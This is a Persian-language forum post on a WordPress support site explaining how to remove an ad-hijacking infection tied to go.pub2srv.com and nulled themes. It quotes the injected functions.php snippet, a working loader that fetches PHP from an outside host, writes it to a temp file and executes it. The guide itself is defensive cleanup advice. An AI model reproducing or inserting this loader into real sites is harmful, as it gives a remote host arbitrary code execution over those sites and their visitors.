تبلیغات
پشتیبانی وردپرس پشتیبانی سایت آپلود عکس قالب وردپرس


امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
روش حذف ویروس go.pub2srv.com وردپرس
#1
دوستان سلام

یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.

جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!

شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.

توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.

صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.

نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)

آموزش حذف ویروس :

اول سایتتون رو اینجا وارد کنید و چک کنید

دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.


حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید

و قطعه کد زیر رو ازش حذف کنید

کد php:
if ( ! function_exists'wp_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if(
$tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
{

function 
wp_temp_setup($phpCode) {
    
$tmpfname tempnam(sys_get_temp_dir(), "wp_temp_setup");
    
$handle fopen($tmpfname"w+");
    
fwrite($handle"<?php\n" $phpCode);
    
fclose($handle);
    include 
$tmpfname;
    
unlink($tmpfname);
    return 
get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}

?>

حالا افزونه Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.

(این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)

در آخر، با اجازه ادمین اگر همه چیز اوکی بود مشکلتون حل شد. روی لینک وبسایت من کلیک کنید دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
- موفق باشید

سپاس
پاسخ
تبلیغات
تبلیغات ارزان تبیلغات
« قدیمی‌تر | جدیدتر »


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان
پشتیبانی وردپرس